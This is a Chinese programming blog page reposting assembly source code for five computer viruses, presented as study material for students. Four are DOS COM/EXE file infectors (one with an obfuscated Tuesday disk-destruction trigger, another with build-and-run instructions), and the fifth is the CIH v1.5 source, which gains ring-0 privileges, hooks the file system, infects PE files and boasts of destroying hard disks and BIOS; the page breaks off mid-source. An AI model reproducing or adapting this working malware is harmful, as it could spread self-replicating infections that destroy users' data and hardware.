- 浏览: 2060566 次
- 性别:
- 来自: 厦门
文章分类
- 全部博客 (1409)
- asp/asp.net学习 (241)
- oracle (10)
- delphi (295)
- java (27)
- pb (1)
- 每日点滴 (49)
- 学习方法 (40)
- 思想方面 (104)
- C语言 (5)
- C++ (1)
- 代码重构经验 (5)
- 软件工程 (3)
- 数据库 (99)
- 英语学习 (3)
- mysql (1)
- 该关注的网站或者网页 (42)
- 总结 (7)
- 要去做的事情 (33)
- 算法 (1)
- 网络方面 (29)
- 随感 (96)
- 操作系统 (36)
- UML (12)
- 常用工具的使用 (55)
- 脚本 (7)
- 汇编 (62)
- 数据结构 (2)
- 财务 (38)
- 语文作文 (16)
- 法律 (1)
- 股票 (88)
最新评论
-
devwang_com:
可以,学习了~~
列出文件夹下所有文件夹的树形结构--Dos命令 tree的使用 -
hvang1988:
不管用啊 frxrprt1.PreviewForm.Pare ...
fastReport预览时嵌入到别的窗体 -
00915132:
我也有这个疑问,非常 感 谢
left join加上where条件的困惑 --SQL优化 -
zhuyoulong:
学习了,高效读书
软件架构师要读的书 -
nTalgar:
非常感谢分享!
Application.ProcessMessages用法:
转自:http://www.programfan.com/blog/article.asp?id=6671
用汇编写的病毒代码
下面的几个病毒程序希望同学们仔细研读,不懂不要紧,先看熟。
病毒一、
;功能:感染当前文件夹的test.com文件
;并删除当前文件夹的del.txt文件
;显示预设的字符串
CSEG SEGMENT
ASSUME CS:CSEG,DS:CSEG,SS:CSEG
main PROC NEAR
mainstart:
CALL vstart ;病毒的代码开始处
vstart:
POP SI ;得到当前地址
MOV BP,SI ;保存当前地址
PUSH SI
MOV AH,9
ADD SI,OFFSET message-OFFSET vstart ;显示预设字符串
MOV DX,SI
INT 21h
POP SI
ADD SI,OFFSET yuan4byte-OFFSET vstart ;取得原程序中的前四个字节
MOV DI,100h ;目的地址
MOV AX,DS:[SI] ;开始复制
MOV DS:[DI],AX
INC SI
INC SI
INC DI
INC DI
MOV AX,DS:[SI]
MOV DS:[DI],AX
MOV SI,BP ;恢复地址值
MOV DX,OFFSET delname-OFFSET vstart
ADD DX,SI
MOV AH,41h
INT 21h
MOV DX,OFFSET filename-OFFSET vstart ;得到文件名
ADD DX,SI
MOV AL,02
MOV AH,3dh ;写文件
INT 21h
JC error
MOV BX,AX ;文件句柄
MOV DX,OFFSET yuan4byte-OFFSET vstart ;读文件的前四个字节
ADD DX,SI
MOV CX,4
MOV AH,3fh
INT 21h
MOV AX,4202h ;到文件尾
XOR CX,CX
XOR DX,DX
INT 21h
MOV DI,OFFSET new4byte-OFFSET vstart ;保存要跳的地方
ADD DI,2
ADD DI,SI
SUB AX,4
MOV DS:[DI],AX
ADD SI,OFFSET mainstart-OFFSET vstart ;准备写入病毒
MOV DX,SI
MOV vsizes,OFFSET vends-OFFSET mainstart
MOV CX,vsizes
MOV AH,40h
INT 21h
MOV SI,BP ;定位到文件头
MOV AL,0
XOR CX,CX
XOR DX,DX
MOV AH,42h
INT 21h
MOV AH,40h ;将新的文件头写入
MOV CX,4
MOV DX,OFFSET new4byte-OFFSET vstart
ADD DX,SI
INT 21h
MOV AH,3eh ;关闭文件
INT 21h
error:
MOV AX,100h
PUSH AX
RET
main ENDP
yuan4byte:
RET
DB 3 DUP (?)
vsizes DW 0
new4byte DB ‘M‘,0e9h,0,0
filename DB "test.com",0
delname DB "del.txt",0
message DB "He he he he!"
DB 0dh,0ah,"$"
vends:
start:
MOV AX,CSEG
MOV DS,AX
MOV SS,AX
CALL main
MOV AX,4c00h
INT 21h
CSEG ENDS
END start
以上就是一个简单的可以传染COM文件的程序代码, 也是想当初我所做的具有传染性质的第一个程序。如何???不难吧。
附:
COM文件执行时将COM文件内所的所有内容COPY到内存, 起始地址是100,然后进行执行
没有任何有关节啦、段啦这些属性.
--------------------------------------------------------------------------------
病毒二、
用汇编语言写一个简单病毒程序源代码
; 感染对象: DOS 的 EXE COM 文件
; 编译工具: MASM 6.0 , MASM 6.11
CODE SEGMENT
assume cs:code
.386
org 100h
start:
mov cs:oldsp,sp ; 保存原程序的堆栈指针
mov cs:oldss,ss ;
mov sp,stack_end
mov ax,cs ; 设置新的堆栈指针
mov ss,ax ;
push ds ;保存原 ds es
push es ;
mov ds,ax
mov es,ax
sub ax,oldseg ; 算出原程序的入口
push ax ; 并保存入栈
push oldip ;
call setfile ;程序的核心部分
pop cs:oldip ; 取回原程序的入口
pop cs:oldseg ;
pop es ; 恢复原 es ds
pop ds ;
mov sp,cs:oldss ; 恢复原 ss,sp
mov ss,sp ;
mov sp,cs:oldsp ;
push oldseg ;跳回原程序入口点
push oldip ;
retf ;
db 09ah
getdate proc near ;这个函数是取得时间是否是星期二是则破坏硬盘数据
mov ax,0ec32h ; 写要执行的代码 int 13h
not ax ; 到 @dest1 位置
mov si,@des1 ; 这里既加密代码
mov word ptr [si],ax ;
mov ah,2ah
int 21h
cmp al,2
jnz @gd_con
mov ax,312h
mov cx,1
mov dx,80h
@des1:
db 0ebh
db 32
ret
@gd_con:
ret
getdate endp
setfile1 proc near
call findfirst
@sf_con:
jc @sf_back
call modify
call findnext
jmp @sf_con
@sf_back:
ret
setfile1 endp
setdata proc near
push si
push di
push cx
push ax
pushf
mov si,offset normal1
mov di,si
mov cx,23h
@aaa2:
lodsb
not ax
stosb
loop @aaa2
popf
pop ax
pop cx
pop di
pop si
ret
setdata endp
setfile proc near
cmp ax,127h ; 没有作用只是干挠
jnz @aaa1 ; ax 不可能等于 127h
call dword ptr oldsp ;
ret ;
db 0e8h ;
@aaa: call getdate
ret
@aaa1:
mov ah,01ah ;设置磁盘传输地址
mov dx,offset dta ;用于 findfirst
int 21h ;
call setdata ;数据解密
push @aaa
mov dx,offset normal1 ; 找 *.exe
mov ax,offset dta
add ax,01eh
mov fs,ax ; fs 用于传递文件名的地址
call setfile1 ; 传染文件
mov dx,offset normal2 ; 找 *.com
call setfile1
mov dx,offset bootcmd ; 找 c:\windows\command.com
mov fs,dx
call setfile1
mov dx,offset bootcmd1 ; 找 c:\command.com
mov si,dx ;
mov word ptr [si],':C' ;
mov fs,dx ;
call setfile1 ;
ret
setfile endp
db 09ah
findfirst proc near
mov ax,04e27h
int 21h
ret
findfirst endp
findnext proc near
mov ah,04fh
int 21h
ret
findnext endp
modify proc near ;修改并感染程序
mov si,offset sbuffer ;可执行的文件头的地址
mov di,offset dta ;文件信息的地址
cmp dword ptr [di+01ah],1000 ; 若文件小于 1K 或 大于 1M 不感染
jb @fn_ret ;
cmp dword ptr [di+01ah],0ffcffh ;
jae @fn_ret ;
mov dx,fs
mov ax,4300h ;保存原文件属性
int 21h ;再改为没有属性
push cx ;
mov ax,4301h
xor cx,cx
int 21h
mov ax,03d02h ; 打开文件
int 21h ;
jc @fn_ret3 ;
mov bx,ax ; 读文件头
mov ah,03fh ;
mov cx,1ch ;
mov dx,offset sbuffer ;
int 21h ;
cmp word ptr [si],'ZM' ; 如不是可执行文件就不感染
jnz @fn_ret1 ;
mov ax,word ptr [si+014h] ; 保存原程序入口
mov oldip,ax ;
mov ax,word ptr [si+016h] ;
mov oldseg,ax
mov ax,4200h ; 检查是否已经被我感染过
mov cx,word ptr [di+1ch] ;
mov dx,word ptr [di+1ah] ;
sub dx,2 ;
int 21h ;
mov ah,3fh ;
mov cx,2 ;
mov dx,offset temp ;
int 21h
cmp word ptr temp,0dcd6h ; 若已经被感染就返回
jz @fn_ret1 ;
mov eax,dword ptr [di+01ah] ; 得到文件的总长
mov cx,0fh
and cx,ax ; 算出感染后的入口点
mov fill,010h ;
sub fill,cx ;
movzx ecx,fill ;
add eax,ecx ;
sub eax,100h
shr eax,4
mov cx,word ptr [si+8]
sub ax,cx
mov word ptr [si+14h],100h
mov word ptr [si+16h],ax
sub ax,oldseg
mov oldseg,ax
mov ax,4202h ;把本病毒写至文件尾
xor cx,cx ;
xor dx,dx ;
int 21h
call setdata
mov ah,40h
mov cx,offset theend
mov dx,offset start
sub dx,fill
sub cx,dx
int 21h
call setdata
jc @fn_ret1
mov ax,4202h ; 算出加载程序的长度
xor cx,cx ;
xor dx,dx ;
int 21h
mov cx,200h
div cx
inc ax
mov word ptr [si+2],dx
mov word ptr [si+4],ax
mov ax,4200h ;改写文件头
xor cx,cx
xor dx,dx
int 21h
mov ah,40h
mov dx,si
mov cx,1ch
int 21h
@fn_ret1:
mov ah,03eh ;关闭文件
int 21h ;
@fn_ret3:
pop cx ;恢复原文件属性
mov ax,4301h ;
mov dx,gs
int 21h
@fn_ret:
ret
modify endp
oldip word 0
oldseg word 0
;======== 用 not 换算过的数据 ========
normal1 db 0d5h,0d1h,09ah,087h,09ah,0ffh ; '*.EXE'
normal2 db 0d5h,0d1h,09ch,090h,092h,0ffh ; '*.COM'
bootcmd db 0bch,0c5h,0a3h,0a8h,0b6h,0b1h,0bbh,0b0h ; 'C:\WINDO'
bootcmd1 db 0a8h,0ach,0a3h,0bch,0b0h,0b2h,0b2h,0beh ; 'WS\COMMAND.COM'
db 0b1h,0bbh,0d1h,0bch,0b0h,0b2h,0ffh
fl word 0dcd6h
theend:
oldsp word 0
oldss word 0
temp word 0
temp1 word 0
dta db 02bh dup(0)
fill word 0
sbuffer db 1dh dup(0)
stack_start db 40h dup(0)
stack_end:
code ends
end start
--------------------------------------------------------------------------------
保持清醒和独立,思想是属于自己的
病毒三、
最简单的病毒
这个病毒恐怕是世界上最简单的病毒了,它只会感染,不会有破坏动作。
Coolest对病毒的每一部分给出了详细的注释。不要说你看不懂哦。^_^
VirusLength equ VirusEnd-VirusStart
codeseg segment
assume cs:codeseg,ds:codeseg,ss:codeseg
org 100h
main proc near
InfectedCode db "M"
db 3 dup(90h)
VirusStart:
call WhereIAm
WhereIAm:
pop si
;si指向pop si的首地址now
mov bp,si
add si,Original4Bytes-WhereIAm
;si指向Original4Bytes的首地址now
mov di,100h
movsw
movsw
;恢复原来的文件头4个字节,以执行完病毒体后返回时正常
;执行原程序
mov si,bp
;si指向pop si的首地址now
mov ah,4eh
Look4NextTarget:
mov dx,offset Target-WhereIAm
add dx,si
mov cx,0
int 21h
;查找第一个com文件
jc error
mov ax,3d02h
mov dx,9eh
int 21h
jc error
xchg ax,bx
mov ah,3fh
mov dx,si
add dx,Original4Bytes-WhereIAm
mov cx,4
int 21h
;保留原com文件前4个字节
mov al,'M'
cmp ds:[si+Original4Bytes-WhereIAm],al
jz SickOrExe
;已感染或是exe文件
mov ax,4202h
xor cx,cx
xor dx,dx
int 21h
;移动指针到文件尾
mov di,offset FourNewBytes-WhereIAm
add di,2
add di,si
;di指向0,0的第一个0
sub ax,4
;恐怕最难明白就是这里了
;病毒把'M' e9写进文件头两个字节里后
;e9 wx yz被翻译为 jmp near $+2+yzwx
;ax此时为文件长度,从而
;文件头两条指令为
;dec bp
;jmp near (文件尾)
mov ds:[di],ax
add si,VirusStart-WhereIAm
;si指向VirusStart
mov ah,40h
mov dx,si
mov cx,VirusLength
int 21h
;写病毒体进文件
mov si,bp
;si指向pop si的首地址now(即WhereIAm)
jc error
mov ax,4200h
xor cx,cx
xor dx,dx
int 21h
;移动文件指针到文件头
mov ah,40h
mov cx,4
mov dx,si
add dx,FourNewBytes-WhereIAm
int 21h
;使文件执行时先跳到文件尾的病毒体执行
jc error
mov ah,3eh
int 21h
;关闭文件,感染完成
SickOrExe:
mov ah,4fh
jmp Look4NextTarget
error:
mov ax,100h
push ax
ret
;文件头四个字节已经恢复,可以正常执行原程序了
main endp
Original4Bytes:
ret
db 3 dup(?)
;病毒初次运行时,若没找到com文件,就会
;执行ret到psp段首
Target db "*.com",0
FourNewBytes db 'M',0e9h,0,0
VirusEnd equ $
codeseg ends
end main
使用说明:
用Masm或Tasm编译,然后用Exe2Com转换为com文件,运行即可感染当前目录下的
所有com文件。
病毒四、
病毒汇编源码
;本病毒并无实质的破坏作用,仅供
;同仁理解Virus原理
;
;病毒源程序
code segment
ASSUME CS:CODE ,DS:CODE
VIRUS:MOV AX,CS
MOV DS,AX
MOV ES,AX
DB 0BBH
GROW DW 0H
LEA SI,BUFFER0[BX]
MOV DI,100H
MOV CX,3
REP MOVSB
MOV AH,1AH
LEA DX,DIR_BUFF[BX]
INT 21H
MOV AH,4EH
MOV CX,20H
LEA DX,SCH_STR[BX]
INT 21H
JC FAIL0
LEA DI,DIR_BUFF[BX]
MOV CX,8
INC DI
MOV AL,3FH
REP STOSB
MOV AH,4FH
INT 21H
FAIL0:JC FAIL1
LEA DI,SCH_STR[BX]
LEA SI,FILE_NAME[BX]
CLD
MOV CX,13
REP MOVSB
MOV AH,3DH
MOV AL,2
LEA DX,FILE_NAME[BX]
INT 21H
FAIL1:JNC FAIL3
JMP FAIL2
FAIL3:MOV FHANDLE[BX],AX
MOV AH,42H
MOV AL,0
PUSH BX
MOV BX,FHANDLE[BX]
MOV CX,0
MOV DX,0
INT 21H
POP BX
MOV AH,3FH
PUSH BX
LEA DX,BUFFER0[BX]
MOV BX,FHANDLE[BX]
MOV CX,3
INT 21H
POP BX
MOV AH,42H
MOV AL,2
PUSH BX
MOV BX,FHANDLE[BX]
MOV CX,0
MOV DX,0
INT 21H
POP BX
SUB AX,3
MOV BUFFER2[BX],AX
ADD AX,103H
MOV GROW[BX],AX
MOV DX,FILE_LENGTH[BX]
ADD AX,DX
JC FAIL2
MOV AH,BUFFER0[BX]
CMP AH,0E9H
JNZ WRITE
MOV AX,BUFFER2[BX]
SUB AX,BUFFER3[BX]
CMP AX,FILE_LENGTH[BX]
JZ CLOSE
WRITE:MOV AH,40H
MOV DX,BX
PUSH BX
MOV DX,BX
MOV CX,FILE_LENGTH[BX]
MOV BX,FHANDLE[BX]
INT 21H
POP BX
MOV AH,42H
MOV AL,0
PUSH BX
MOV BX,FHANDLE[BX]
MOV CX,0
MOV DX,0
INT 21H
POP BX
MOV AH,40H
LEA DX,BUFFER1[BX]
PUSH BX
MOV BX,FHANDLE[BX]
MOV CX,3
INT 21H
POP BX
CLOSE: MOV AH,3EH
PUSH BX
MOV BX,FHANDLE[BX]
INT 21H
POP BX
MOV AH,2CH
INT 21H
AND AH,02H
;JZ FAIL2
CALL SHOW
PUSH CS
MOV AX,100H
PUSH AX
XOR AX,AX
RETF
;JMP SHORT 100
FAIL2: LEA AX,BACK[BX]
SUB AX,0FEH
NOT AX
INC AX
MOV BACK[BX],AX
MOV AH,4CH
INT 21H
DB 0E9H
BACK DW 0FFEBH
SHOW:MOV AX,2
INT 10H
MOV AH,9
LEA DX,STRING[BX]
INT 21H
RET
STRING DB 0AH,0AH,0AH,0DH
DB 'SWTJU VIRUS v0.01 '
病毒五、
CIH V1.5版本病毒源码
Preface:
曾经的CIH病毒威震天下,快看看这V1.5版本的代码
Content:
; ****************************************************************************
; * The Virus Program Information *
; ****************************************************************************
; * *
; * Designer : CIH Source : TTIT of TATUNG in Taiwan *
; * Create Date : 04/26/1998 E-mail : WinCIH.Tatung@usa.net *
; * Modification Time : 06/01/1998 Version : 1.5 *
; * *
; * Turbo Assembler Version 5.0 : Tasm /m cih *
; * Turbo Link Version 5.01 : Tlink /3 /t cih, cih.exe *
; * *
; *==========================================================================*
; * Modification History *
; *==========================================================================*
; * v1.0 1. Create the Virus Program. *
; * 2. The Virus Modifies IDT to Get Ring0 Privilege. *
; * 04/26/1998 3. Virus Code doesn't Reload into System. *
; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *
; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. *
; * 6. When System Opens Existing PE File, the File will be *
; * Infected, and the File doesn't be Reinfected. *
; * 7. It is also Infected, even the File is Read-Only. *
; * 8. When the File is Infected, the Modification Date and Time *
; * of the File also don't be Changed. *
; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call *
; * Previous FileSystemApiHook, it will Call the Function *
; * that the IFS Manager Would Normally Call to Implement *
; * this Particular I/O Request. *
; * 10. The Virus Size is only 656 Bytes. *
; *==========================================================================*
; * v1.1 1. Especially, the File that be Infected will not Increase *
; * it's Size... ^__^ *
; * 05/15/1998 2. Hook and Modify Structured Exception Handing. *
; * When Exception Error Occurs, Our OS System should be in *
; * Windows NT. So My Cute Virus will not Continue to Run, *
; * it will Jmup to Original Application to Run. *
; * 3. Use Better Algorithm, Reduce Virus Code Size. *
; * 4. The Virus "Basic" Size is only 796 Bytes. *
; *==========================================================================*
; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... *
; * 2. Modify the Bug of v1.1 *
; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. *
; *==========================================================================*
; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Error. *
; * So When Open WinZip Self-Extractor ==> Don't Infect it. *
; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes. *
; *==========================================================================*
; * v1.4 1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. *
; * 2. Change the Date of Killing Computers. *
; * 05/31/1998 3. Modify Virus Version Copyright. *
; * 4. The Virus "Basic" Size is 1019 Bytes. *
; ****************************************************************************
; * v1.5 1. Full Modify the Bug : Change Harddisk Killing Port *
; * 2. Modify Virus Version Copyright. *
; * 06/01/1998 3. Clear Garbage in Source Code. *
; * 4. The Virus "Small" Size in 10xx Bytes. *
; ****************************************************************************
.586
; ****************************************************************************
; * Original PE Executable File(Don't Modify this Section) *
; ****************************************************************************
OriginalAppEXE SEGMENT
FileHeader:
db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h
db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
dd 00000000h, VirusSize
OriginalAppEXE ENDS
; ****************************************************************************
; * My Virus Game *
; ****************************************************************************
; *********************************************************
; * Constant Define *
; *********************************************************
TRUE = 1
FALSE = 0
DEBUG = TRUE
IF DEBUG
FirstKillHardDiskNumber = 82h
HookExceptionNumber = 06h
ELSE
FirstKillHardDiskNumber = 81h
HookExceptionNumber = 04h
ENDIF
FileNameBufferSize = 7fh
; *********************************************************
; *********************************************************
VirusGame SEGMENT
ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame
ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame
; *********************************************************
; * Ring3 Virus Game Initial Program *
; *********************************************************
MyVirusStart:
push ebp
; *************************************
; * Let's Modify Structured Exception *
; * Handing, Prevent Exception Error *
; * Occurrence, Especially in NT. *
; *************************************
lea eax, [esp-04h*2]
xor ebx, ebx
xchg eax, fs:[ebx]
call @0
@0:
pop ebx
lea ecx, StopToRunVirusCode-@0[ebx]
push ecx
push eax
; *************************************
; * Let's Modify *
; * IDT(Interrupt Descriptor Table) *
; * to Get Ring0 Privilege... *
; *************************************
push eax ;
sidt [esp-02h] ; Get IDT Base Address
pop ebx ;
add ebx, HookExceptionNumber*08h+04h ; ZF = 0
cli
mov ebp, [ebx] ; Get Exception Base
mov bp, [ebx-04h] ; Entry Point
lea esi, MyExceptionHook-@1[ecx]
push esi
mov [ebx-04h], si ;
shr esi, 16 ; Modify Exception
mov [ebx+02h], si ; Entry Point Address
pop esi
; *************************************
; * Generate Exception to Get Ring0 *
; *************************************
int HookExceptionNumber ; GenerateException
ReturnAddressOfEndException = $
; *************************************
; * Merge All Virus Code Section *
; *************************************
push esi
mov esi, eax
LoopOfMergeAllVirusCodeSection:
mov ecx, [eax-04h]
rep movsb
sub eax, 08h
mov esi, [eax]
or esi, esi
jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1
jmp LoopOfMergeAllVirusCodeSection
QuitLoopOfMergeAllVirusCodeSection:
pop esi
; *************************************
; * Generate Exception Again *
; *************************************
int HookExceptionNumber ; GenerateException Again
; *************************************
; * Let's Restore *
; * Structured Exception Handing *
; *************************************
ReadyRestoreSE:
sti
xor ebx, ebx
jmp RestoreSE
; *************************************
; * When Exception Error Occurs, *
; * Our OS System should be in NT. *
; * So My Cute Virus will not *
; * Continue to Run, it Jmups to *
; * Original Application to Run. *
; *************************************
StopToRunVirusCode:
@1 = StopToRunVirusCode
xor ebx, ebx
mov eax, fs:[ebx]
mov esp, [eax]
RestoreSE:
pop dword ptr fs:[ebx]
pop eax
; *************************************
; * Return Original App to Execute *
; *************************************
pop ebp
push 00401000h ; Push Original
OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack
ret ; Return to Original App Entry Point
; *********************************************************
; * Ring0 Virus Game Initial Program *
; *********************************************************
MyExceptionHook:
@2 = MyExceptionHook
jz InstallMyFileSystemApiHook
; *************************************
; * Do My Virus Exist in System !? *
; *************************************
mov ecx, dr0
jecxz AllocateSystemMemoryPage
add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException
; *************************************
; * Return to Ring3 Initial Program *
; *************************************
ExitRing0Init:
mov [ebx-04h], bp ;
shr ebp, 16 ; Restore Exception
mov [ebx+02h], bp ;
iretd
; *************************************
; * Allocate SystemMemory Page to Use *
; *************************************
AllocateSystemMemoryPage:
mov dr0, ebx ; Set the Mark of My Virus Exist in System
push 00000000fh ;
push ecx ;
push 0ffffffffh ;
push ecx ;
push ecx ;
push ecx ;
push 000000001h ;
push 000000002h ;
int 20h ; VMMCALL _PageAllocate
_PageAllocate = $ ;
dd 00010053h ; Use EAX, ECX, EDX, and flags
add esp, 08h*04h
xchg edi, eax ; EDI = SystemMemory Start Address
lea eax, MyVirusStart-@2[esi]
iretd ; Return to Ring3 Initial Program
; *************************************
; * Install My File System Api Hook *
; *************************************
InstallMyFileSystemApiHook:
lea eax, FileSystemApiHook-@6[edi]
push eax ;
int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook
IFSMgr_InstallFileSystemApiHook = $
dd 00400067h ; Use EAX, ECX, EDX, and flags
mov dr0, eax ; Save OldFileSystemApiHook Address
pop eax ; EAX = FileSystemApiHook Address
; Save Old IFSMgr_InstallFileSystemApiHook Entry Point
mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]
mov edx, [ecx]
mov OldInstallFileSystemApiHook-@3[eax], edx
; Modify IFSMgr_InstallFileSystemApiHook Entry Point
lea eax, InstallFileSystemApiHook-@3[eax]
mov [ecx], eax
cli
jmp ExitRing0Init
; *********************************************************
; * Code Size of Merge Virus Code Section *
; *********************************************************
CodeSizeOfMergeVirusCodeSection = offset $
; *********************************************************
; * IFSMgr_InstallFileSystemApiHook *
; *********************************************************
InstallFileSystemApiHook:
push ebx
call @4 ;
@4: ;
pop ebx ; mov ebx, offset FileSystemApiHook
add ebx, FileSystemApiHook-@4 ;
push ebx
int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook
IFSMgr_RemoveFileSystemApiHook = $
dd 00400068h ; Use EAX, ECX, EDX, and flags
pop eax
; Call Original IFSMgr_InstallFileSystemApiHook
; to Link Client FileSystemApiHook
push dword ptr [esp+8]
call OldInstallFileSystemApiHook-@3[ebx]
pop ecx
push eax
; Call Original IFSMgr_InstallFileSystemApiHook
; to Link My FileSystemApiHook
push ebx
call OldInstallFileSystemApiHook-@3[ebx]
pop ecx
mov dr0, eax ; Adjust OldFileSystemApiHook Address
pop eax
pop ebx
ret
; *********************************************************
; * Static Data *
; *********************************************************
OldInstallFileSystemApiHook dd ?
; *********************************************************
; * IFSMgr_FileSystemHook *
; *********************************************************
; *************************************
; * IFSMgr_FileSystemHook Entry Point *
; *************************************
FileSystemApiHook:
@3 = FileSystemApiHook
pushad
call @5 ;
@5: ;
pop esi ; mov esi, offset VirusGameDataStartAddress
add esi, VirusGameDataStartAddress-@5
; *************************************
; * Is OnBusy !? *
; *************************************
test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy )
jnz pIFSFunc ; goto pIFSFunc
; *************************************
; * Is OpenFile !? *
; *************************************
; if ( NotOpenFile )
; goto prevhook
lea ebx, [esp+20h+04h+04h]
cmp dword ptr [ebx], 00000024h
jne prevhook
; *************************************
; * Enable OnBusy *
; *************************************
inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy
; *************************************
; * Get FilePath's DriveNumber, *
; * then Set the DriveName to *
; * FileNameBuffer. *
; *************************************
; * Ex. If DriveNumber is 03h, *
; * DriveName is 'C:'. *
; *************************************
add esi, FileNameBuffer-@6
push esi
mov al, [ebx+04h]
cmp al, 0ffh
je CallUniToBCSPath
add al, 40h
mov ah, ':'
mov [esi], eax
inc esi
inc esi
; *************************************
; * UniToBCSPath *
; *************************************
; * This Service Converts *
; * a Canonicalized Unicode Pathname *
; * to a Normal Pathname in the *
; * Specified BCS Character Set. *
; *************************************
CallUniToBCSPath:
push 00000000h
push FileNameBufferSize
mov ebx, [ebx+10h]
mov eax, [ebx+0ch]
add eax, 04h
push eax
push esi
int 20h ; VXDCall UniToBCSPath
UniToBCSPath = $
dd 00400041h
add esp, 04h*04h
; *************************************
; * Is FileName '.EXE' !? *
; *************************************
cmp [esi+eax-04h], 'EXE.'
pop esi
jne DisableOnBusy
IF DEBUG
; *************************************
; * Only for Debug *
; *************************************
cmp [esi+eax-06h], 'KCUF'
jne DisableOnBusy
ENDIF
; *************************************
; * Is Open Existing File !? *
; *************************************
; if ( NotOpenExistingFile )
; goto DisableOnBusy
cmp word ptr [ebx+18h], 01h
jne DisableOnBusy
; *************************************
; * Get Attributes of the File *
; *************************************
mov ax, 4300h
int 20h ; VXDCall IFSMgr_Ring0_FileIO
IFSMgr_Ring0_FileIO = $
dd 00400032h
jc DisableOnBusy
push ecx
; *************************************
; * Get IFSMgr_Ring0_FileIO Address *
; *************************************
mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi]
mov edi, [edi]
; *************************************
; * Is Read-Only File !? *
; *************************************
test cl, 01h
jz OpenFile
